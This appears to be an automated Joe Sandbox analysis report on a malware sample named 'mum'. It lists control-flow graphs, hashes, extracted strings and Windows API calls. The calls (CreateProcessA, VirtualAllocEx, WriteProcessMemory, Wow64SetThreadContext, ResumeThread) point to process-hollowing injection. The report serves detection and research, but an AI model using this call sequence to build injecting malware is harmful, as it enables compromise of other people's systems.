                                      • Instruction ID: 3eb28359d7d43a6c0286a9790b9cfb3610294d5db42687d78b52ddad879df401
                                      • Opcode Fuzzy Hash: 12d52d4301c761bd9225f86e0827e293379b8d1af6b519651d0362d4eb7a64b2
                                      • Instruction Fuzzy Hash: 7541CF347001148FC748EF78C455A6E7BF2AF8A310B2581A9E916DF7A6DF30DC158BA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 421 241750-24177c 425 24177e-241785 421->425 426 241788-241790 421->426 428 241792-241799 426->428 429 24179c-2417b6 426->429 431 2417bc-2417c9 429->431 432 241899 429->432 431->432 433 2417cf-2417d9 431->433 434 24189e-2418b3 call 2418d6 432->434 433->432 435 2417df-2417e9 433->435 437 2418b9-2418bb 434->437 435->432 436 2417ef-24180a 435->436 438 24180d-241825 436->438 439 2418c1-2418c7 437->439 440 2418bd-2418c0 437->440 438->432 441 241827-241853 438->441 441->432 442 241855-241866 441->442 442->438 443 241868-24186a 442->443 444 24186d-241872 443->444 444->432 445 241874-24187e 444->445 445->444 446 241880-241896 445->446
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $.*=
                                      • API String ID: 0-954985398
                                      • Opcode ID: b62e467e6946936154dfdad5315ac8231e2d395059f7ecdf419b546a9f4d43ed
                                      • Instruction ID: 3e6fa2db534a6b198b04b90e35fa22bda64b32914d33ad8ea9c9cbd11350f5b7
                                      • Opcode Fuzzy Hash: b62e467e6946936154dfdad5315ac8231e2d395059f7ecdf419b546a9f4d43ed
                                      • Instruction Fuzzy Hash: D241CF71F2010A8FDB14CFA9D8846AEBBB6FB85311B158526D514DB705D330ECA1CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 448 245e48-245e68 449 245e8a-245eaf 448->449 452 245eb4-245ebe 449->452 453 245eb1 449->453 454 245ec7-245eca 452->454 455 245ec0-245ec5 452->455 453->452 456 245ecd-245edc 454->456 455->456 458 245e6a-245e6d 456->458 459 245e76-245e88 458->459 460 245e6f 458->460 459->458 460->449 460->459 461 245f82-245f88 460->461 462 245f4c-245f55 460->462 463 245ede-245ef8 460->463 464 245f58-245f5c 460->464 465 245f0b-245f1a 460->465 468 245f8c-245f98 461->468 469 245f8a 461->469 462->464 477 245fc5 463->477 480 245efe-245f06 463->480 466 245f5e-245f68 464->466 467 245f7b-245f80 464->467 488 245f1c call 2462a7 465->488 489 245f1c call 2461c1 465->489 473 245fca-245fcf 466->473 474 245f6a-245f71 466->474 467->461 472 245f76 467->472 475 245f9a-245fa5 468->475 469->475 471 245f22-245f25 471->477 478 245f2b-245f35 471->478 472->458 474->472 484 245fa7-245fad 475->484 485 245fbd-245fc4 475->485 477->473 478->473 481 245f3b-245f47 478->481 480->458 481->458 486 245fb1-245fb3 484->486 487 245faf 484->487 486->485 487->485 488->471 489->471
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 48l$48l
                                      • API String ID: 0-1341598364
                                      • Opcode ID: 8a0d8ea635193d72b14b39e44c86a37f22d424f0eca05fd84599c1fff2766a3f
                                      • Instruction ID: 3f9746ee916d6dc79504b2c5e5c839627ca083ae5f735af42db00fb4464437d3
                                      • Opcode Fuzzy Hash: 8a0d8ea635193d72b14b39e44c86a37f22d424f0eca05fd84599c1fff2766a3f
                                      • Instruction Fuzzy Hash: CE410630B20625CFCB088FA8C84567EB6F5FB45740F65443AE182DB792D7749D64CB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 490 246008-24602c 491 246062-246067 490->491 492 24602e-246031 491->492 493 246033 492->493 494 24603a-24604e 492->494 493->491 493->494 495 246164-24616b 493->495 496 2460cc-2460dd 493->496 497 24611e-24612a 493->497 498 246098-2460a2 493->498 499 2460b9-2460c7 493->499 500 246069-246074 493->500 501 24610a-24610e 493->501 506 24617e-246186 494->506 514 246054-246060 494->514 495->506 510 24616d-246179 495->510 502 2460e4-2460e6 496->502 503 2460df-2460e3 496->503 497->506 509 24612c-24614e 497->509 498->506 511 2460a8-2460b4 498->511 499->492 507 246076 500->507 508 24607d-246084 500->508 505 246110-246119 501->505 501->506 512 246103-246108 502->512 513 2460e8-2460ef 502->513 503->502 505->492 515 24607b 507->515 508->506 517 24608a-246096 508->517 509->506 516 246150-246161 509->516 510->492 511->492 520 2460fe 512->520 513->506 519 2460f5-2460f9 513->519 514->492 515->492 517->515 519->520 520->492
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 48l$48l
                                      • API String ID: 0-1341598364
                                      • Opcode ID: 3bb4f497603dc6b2414da72582402f5114b4af7e183907def66b492fec0967bb
                                      • Instruction ID: 7eaf5f59e1517e292cc1c5168fde42319d6e27592902c6234fd6a38ac803d731
                                      • Opcode Fuzzy Hash: 3bb4f497603dc6b2414da72582402f5114b4af7e183907def66b492fec0967bb
                                      • Instruction Fuzzy Hash: AF41B234924611CBC7289F68CC486BAB7F1FF46301F189127E429CB265D3B4DD60C712
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 568 48b7270-48b7309 570 48b730b-48b7322 568->570 571 48b7352-48b737a 568->571 570->571 576 48b7324-48b7329 570->576 574 48b737c-48b7390 571->574 575 48b73c0-48b7416 571->575 574->575 583 48b7392-48b7397 574->583 585 48b7418-48b742c 575->585 586 48b745c-48b7553 CreateProcessA 575->586 577 48b732b-48b7335 576->577 578 48b734c-48b734f 576->578 580 48b7339-48b7348 577->580 581 48b7337 577->581 578->571 580->580 584 48b734a 580->584 581->580 587 48b73ba-48b73bd 583->587 588 48b7399-48b73a3 583->588 584->578 585->586 593 48b742e-48b7433 585->593 604 48b755c-48b75ba 586->604 605 48b7555-48b755b 586->605 587->575 590 48b73a7-48b73b6 588->590 591 48b73a5 588->591 590->590 594 48b73b8 590->594 591->590 595 48b7456-48b7459 593->595 596 48b7435-48b743f 593->596 594->587 595->586 598 48b7443-48b7452 596->598 599 48b7441 596->599 598->598 600 48b7454 598->600 599->598 600->595 609 48b75c4-48b7615 604->609 605->604 616 48b7618-48b761e 609->616 617 48b75ab-48b75ba 616->617 618 48b7620-48b763e 616->618 617->609 618->616 620 48b7640-48b7641 618->620 621 48b7643-48b7647 620->621 622 48b7651-48b7655 620->622 621->622 623 48b7649 621->623 624 48b7657-48b765b 622->624 625 48b7665-48b7669 622->625 623->622 624->625 626 48b765d 624->626 627 48b766b-48b766f 625->627 628 48b7679-48b767d 625->628 626->625 627->628 631 48b7671 627->631 629 48b767f-48b76a8 628->629 630 48b76b3-48b76be 628->630 629->630 635 48b76bf 630->635 631->628 635->635
                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 048B7537
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_48b0000_mum.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 580070ee706b80351d57ec1ea50d04d1b0464449f5b04cffe7e9c05b62ae76ed
                                      • Instruction ID: 5f182980d1b2369d840138fd677c59fa36e928c3c21d20a3b01d34919c5ce37d
                                      • Opcode Fuzzy Hash: 580070ee706b80351d57ec1ea50d04d1b0464449f5b04cffe7e9c05b62ae76ed
                                      • Instruction Fuzzy Hash: 0CC13770D0025D9FDB24DFA4C841BEDBBB1BF49304F0096A9E959B7240DB70AA85CF95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 636 244638-244639 637 244640-244685 636->637 639 244688-244694 637->639 640 244696-2446f4 639->640 641 244631-244636 639->641 644 2446f6-244726 640->644 645 244728-24474f 640->645 641->636 648 244758-2447c2 644->648 645->648 651 2447c8-2447d4 648->651 652 2447db-2447ee 651->652 653 2447fd-244827 652->653 656 244842-24484d 653->656 657 244829-24482c 653->657 659 244854-24485a 656->659 660 24484f 656->660 658 24482e-24483c 657->658 658->656 661 244166-244174 658->661 660->659 662 244176 661->662 663 24417b-2441d7 661->663 662->663 666 244264-244268 663->666 666->658 667 24426e-244275 666->667 668 2441dc-2441fd 667->668 669 24427b-2442b0 667->669 672 2441ff-244202 668->672 673 244209-244215 668->673 677 2442b2-2442be 669->677 678 2442da 669->678 674 244206-244207 672->674 673->674 676 244217-244218 673->676 674->669 679 244255-24425c 676->679 683 2442c0-2442c6 677->683 684 2442c8-2442ce 677->684 680 2442e0-244313 678->680 681 24425e-244261 679->681 682 24421a-244228 679->682 692 244315-24434d 680->692 693 244362-24440d 680->693 681->666 686 24422f-244237 682->686 687 24422a 682->687 688 2442d8 683->688 684->688 689 24424f-244252 686->689 690 244239-24424d 686->690 687->686 688->680 689->679 690->681 692->653 701 244477-244483 693->701 702 244485-24454a 701->702 703 24440f-244437 701->703 716 24454c-244585 702->716 717 24458b-244592 702->717 704 24443e-24446b 703->704 705 244439 703->705 704->669 711 244471-244474 704->711 705->704 711->701 716->717 718 244594-2445cd 717->718 719 2445d3-2445da 717->719 718->719 720 2445dc-244615 719->720 721 24461b-244622 719->721 720->721 721->640 723 244624-24462f 721->723 723->639
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ~
                                      • API String ID: 0-1707062198
                                      • Opcode ID: d613b7affa92235f5fccd6ef8b067230e82796b8acf1f141c00dca4db69ff438
                                      • Instruction ID: b5d12a430d8bac290cee08743c075cc5d30b9c6cdadd7130575b57b23cd0280d
                                      • Opcode Fuzzy Hash: d613b7affa92235f5fccd6ef8b067230e82796b8acf1f141c00dca4db69ff438
                                      • Instruction Fuzzy Hash: 7622DF75A10218DFCB19DF58C984E98BBB2FF49314F1681D4EA09AB262C731EDA1DF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 726 48b6e48-48b6eb3 728 48b6eca-48b6f31 WriteProcessMemory 726->728 729 48b6eb5-48b6ec7 726->729 731 48b6f3a-48b6f8c 728->731 732 48b6f33-48b6f39 728->732 729->728 732->731
                                      APIs
                                      • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 048B6F1B
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_48b0000_mum.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 5659c8e5f256e33583ff3d4ccae0d3bed5fe6b8b7326bfa78c683db8f1098e59
                                      • Instruction ID: ac4ef32fc3f30d6c84dda33630907a9c0934c28dab4b5802bec1cd61988189a3
                                      • Opcode Fuzzy Hash: 5659c8e5f256e33583ff3d4ccae0d3bed5fe6b8b7326bfa78c683db8f1098e59
                                      • Instruction Fuzzy Hash: 6C41A9B4D012489FCF00CFA9D884AEEBBB1BB49314F20942AE815B7250D735AA45CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 737 48b6fd0-48b70a0 ReadProcessMemory 740 48b70a9-48b70fb 737->740 741 48b70a2-48b70a8 737->741 741->740
                                      APIs
                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 048B708A
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_48b0000_mum.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: 7463d1896e683228b9987ea3bce3cbe38180d6cfcabaee5b9e3fe222bab0f3af
                                      • Instruction ID: 2f4e7d81c8dc0a40507ae9cc5acbc47fde61732e6b70be7dc7754734d6a0ec7d
                                      • Opcode Fuzzy Hash: 7463d1896e683228b9987ea3bce3cbe38180d6cfcabaee5b9e3fe222bab0f3af
                                      • Instruction Fuzzy Hash: DA41A8B4D042589FCF10CFA9D884AEEFBB1BF49314F10942AE815B7240D775AA46CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 048B708A
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_48b0000_mum.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: 29ba6ead0c5b275da271ccc227aab1a6492b8c6611b12f2e10bb032c82f9da5f
                                      • Instruction ID: 344ddbfc7db6b44158c1c43fc1b798bffb0a59d1c672d72ccf0126c97294d559
                                      • Opcode Fuzzy Hash: 29ba6ead0c5b275da271ccc227aab1a6492b8c6611b12f2e10bb032c82f9da5f
                                      • Instruction Fuzzy Hash: D041A7B4D042589FCF10CFA9D884AEEFBB1BF49314F10942AE915B7240D735A946CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 048B6D9A
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_48b0000_mum.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: c3388e55f011d296cd9430364292f0b588efb626f23d15b145b6e1452ee1a1f5
                                      • Instruction ID: 9d43d71ed3b193f920dd8e01d99c293679727754627395c35675d916bc357a33
                                      • Opcode Fuzzy Hash: c3388e55f011d296cd9430364292f0b588efb626f23d15b145b6e1452ee1a1f5
                                      • Instruction Fuzzy Hash: FF4188B8D042589FCF10CFA9D884ADEBBB1FB49314F14942AE915B7300E735A916CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 048B6BAF
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_48b0000_mum.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: a02ad0b8e11c1ae0fa8ec2ed1ca908cb7dc77fa43e817f3f8d7c3fe347d6e425
                                      • Instruction ID: daaec339282ff24d5a396ff2db13a0b1a33af9f05372bf853e8070fc448f28d1
                                      • Opcode Fuzzy Hash: a02ad0b8e11c1ae0fa8ec2ed1ca908cb7dc77fa43e817f3f8d7c3fe347d6e425
                                      • Instruction Fuzzy Hash: 6741BFB4D042589FCB10CFA9D884AEEBBB1FF49314F14842AE415B7340D779A945CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 048B6BAF
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_48b0000_mum.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: cd715d6a19ef28459d31b27ada3368190032568edcad9b6cde67db4fbfa38dce
                                      • Instruction ID: 2b52f00702084ec918ef5f9a76bb4f9be987bb639ab3eb39bbf0c2faba3ef6de
                                      • Opcode Fuzzy Hash: cd715d6a19ef28459d31b27ada3368190032568edcad9b6cde67db4fbfa38dce
                                      • Instruction Fuzzy Hash: 7341ACB4D002589FCB14CFA9D884AEEBBB1FF49314F14842AE415B7340E779A945CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_48b0000_mum.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 2658500bcad0fa5073535f88804a7644e98e5be0461b9023989f0598c0ecacec
                                      • Instruction ID: e867c7b11717bb30cf6f15ba9050b9622ca113e9c6a36f5e73324af6764e9058
                                      • Opcode Fuzzy Hash: 2658500bcad0fa5073535f88804a7644e98e5be0461b9023989f0598c0ecacec
                                      • Instruction Fuzzy Hash: BE31BBB4D012089FCF14CFA9E884AEEFBB5EF49214F14941AE815B7300D735A946CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_48b0000_mum.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: ededf5c516cbd20a974808f634ac4cd5168f50d9a6f52203bbe5dbd736ced8e4
                                      • Instruction ID: 9404e0a60d395231661050a15b7f51e0837b0f0ca6bb8db3e3cb20e262315347
                                      • Opcode Fuzzy Hash: ededf5c516cbd20a974808f634ac4cd5168f50d9a6f52203bbe5dbd736ced8e4
                                      • Instruction Fuzzy Hash: A131A8B4D012189FCF14CFA9D884AAEFBB1EB49314F10942AE815B7300E735A942CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 48l
                                      • API String ID: 0-3926459034
                                      • Opcode ID: 7567d1a5bf88b6b898ef607f3faab1145cf3f5cc0d2f3f3abc0c6cf93ce1e89c
                                      • Instruction ID: d45d87c0b305d23afd5eea5da5aba0a903d33c09b4ca17da721307a38a80132b
                                      • Opcode Fuzzy Hash: 7567d1a5bf88b6b898ef607f3faab1145cf3f5cc0d2f3f3abc0c6cf93ce1e89c
                                      • Instruction Fuzzy Hash: AA510830A24611CBCB28CFA4D9482BAB7F1EF47701F14816BE96ADB291D3B48C64D716
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Fl
                                      • API String ID: 0-3640630996
                                      • Opcode ID: c0337ef3472c2f5797159462a59911413c62fafadfdc9515e4f2230bdbe472d3
                                      • Instruction ID: 032c8045eb7769a07b09603a0272e335a47bf22640ebe39a4f25c9da53828bfe
                                      • Opcode Fuzzy Hash: c0337ef3472c2f5797159462a59911413c62fafadfdc9515e4f2230bdbe472d3
                                      • Instruction Fuzzy Hash: D4514AB8D0020E9FDF14CFA9D881AEEBBB1BF89300F10A569D412EB291DB309951CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 48l
                                      • API String ID: 0-3926459034
                                      • Opcode ID: 2c93b9e355467b824ca4a65267a316c61b265d62417ec41395d98ea7b3acfb14
                                      • Instruction ID: ad813a6ab76c9955781b2b85c3a9ff2a5087748eb095178c0f023ff1728ce672
                                      • Opcode Fuzzy Hash: 2c93b9e355467b824ca4a65267a316c61b265d62417ec41395d98ea7b3acfb14
                                      • Instruction Fuzzy Hash: 0B312630B20A26CFCB088FA8C8457BEB7F5FB45740F65443AE082D7692D7B49964CB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_54c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: `!l
                                      • API String ID: 0-283557256
                                      • Opcode ID: 52f83e533f828d7fe318e60b5a2182e8df15c5eeab6777a70adea8bcb3fb399c
                                      • Instruction ID: 00bea38d1c2402ab5d7c55af94a20a00ee0cff92798cb2c134297119a4dcfc67
                                      • Opcode Fuzzy Hash: 52f83e533f828d7fe318e60b5a2182e8df15c5eeab6777a70adea8bcb3fb399c
                                      • Instruction Fuzzy Hash: A331D474E0021D9FDB05DFA9D9519EEBBB2EF88204F14802AE915A7760EB3459068F91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_54c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: B-z
                                      • API String ID: 0-1806057957
                                      • Opcode ID: 1db3bf2f4436b3167ad55de3a7e6d67cb840ccc565edf501132530b9ea31011a
                                      • Instruction ID: 405a96e49bc2022f32e9085c0ef31a2145533f323747d1987662fd59db766da6
                                      • Opcode Fuzzy Hash: 1db3bf2f4436b3167ad55de3a7e6d67cb840ccc565edf501132530b9ea31011a
                                      • Instruction Fuzzy Hash: CE217A78E042198FCB48CFA9C8446EEBBB6EBC8300F15C5AAC409B3350DB344902CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_54c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: B-z
                                      • API String ID: 0-1806057957
                                      • Opcode ID: 93c751c6c3340738a466dd477b9c43c15d868236ac3d5dca8cb4de1b565f2e08
                                      • Instruction ID: 47ac367f25f483a5b09b02e235fdacb21491eb38986220cc21bcb800186c70e2
                                      • Opcode Fuzzy Hash: 93c751c6c3340738a466dd477b9c43c15d868236ac3d5dca8cb4de1b565f2e08
                                      • Instruction Fuzzy Hash: B4212778E042198BCB48CFA9C8446EEBBBAEBC9300F05D56AD519B3354DB705942CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Fl
                                      • API String ID: 0-3640630996
                                      • Opcode ID: df7127efa8ed617ccbe6d551d20e6d88e4f0e98aaa2747a666c10e11a30a17b6
                                      • Instruction ID: 0c729bc32cba2169f0e4358c10ebf769ac6980274235ff32e650415918dc5384
                                      • Opcode Fuzzy Hash: df7127efa8ed617ccbe6d551d20e6d88e4f0e98aaa2747a666c10e11a30a17b6
                                      • Instruction Fuzzy Hash: EA1190323604218FC768DB7DD85496973F5EF8976430584BAF50ACB771EB21DCA18B90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 48l
                                      • API String ID: 0-3926459034
                                      • Opcode ID: 5343a20b3e16ff581eef87e8c7c22838e8b6f34f5f7be9f385001070f1193800
                                      • Instruction ID: f95fec1219f1cf7689da2576494a5eeb531384404207ba57f253851a82691835
                                      • Opcode Fuzzy Hash: 5343a20b3e16ff581eef87e8c7c22838e8b6f34f5f7be9f385001070f1193800
                                      • Instruction Fuzzy Hash: CA014931718200EFD7188BE49C19B6A36E5E78AB41F20043AF90ACB3C1DBF18C509382
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: )
                                      • API String ID: 0-2427484129
                                      • Opcode ID: a4d178b6a8ada5066165154d36bc427816e9aa734ecf271267d494a7e76b68fc
                                      • Instruction ID: abc1760552e61728b4ea63060a08e4353a3f62ae22555fe91f5c8343858643c7
                                      • Opcode Fuzzy Hash: a4d178b6a8ada5066165154d36bc427816e9aa734ecf271267d494a7e76b68fc
                                      • Instruction Fuzzy Hash: D1D02B3011A20CEFCF18DBB0D4086AD7B7CDF07305F140094940943911C7700EB4DA81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2
                                      • API String ID: 0-450215437
                                      • Opcode ID: 8f37880f7f9ff44b02b0910598d36ce765bb5f7fd5d0054d2787f73768c4cead
                                      • Instruction ID: dd86bd35c1ded19ae7c82d0ed060e475d5b98cb8fd4267957bebcb2232421d74
                                      • Opcode Fuzzy Hash: 8f37880f7f9ff44b02b0910598d36ce765bb5f7fd5d0054d2787f73768c4cead
                                      • Instruction Fuzzy Hash: 8ED0A73056A108D6CA09EBE4E406A6B736CC702349F1014589809136528AB00EE0EE81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: 5313e0e996321040cce2650aec99c782edbfc80bfc271f1dfd71c74d5ed76ac1
                                      • Instruction ID: 3614ab086f7184d1e551d80312d2a3a8986040ab06d256fe483fef655a5f3413
                                      • Opcode Fuzzy Hash: 5313e0e996321040cce2650aec99c782edbfc80bfc271f1dfd71c74d5ed76ac1
                                      • Instruction Fuzzy Hash: 3DD0A770869108E7C608FBE4D80577DB76C8702705F20048899095395186F00F649A85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: )
                                      • API String ID: 0-2427484129
                                      • Opcode ID: f1a9bed67baa7dd20ff274dd2c38786884ff78b3fef461ed771778843f31ed31
                                      • Instruction ID: e7a41d7eedeef00f4f8a4ea3fcdb28b048aaf4b0ff5bdc8182ed9c87f11e31e3
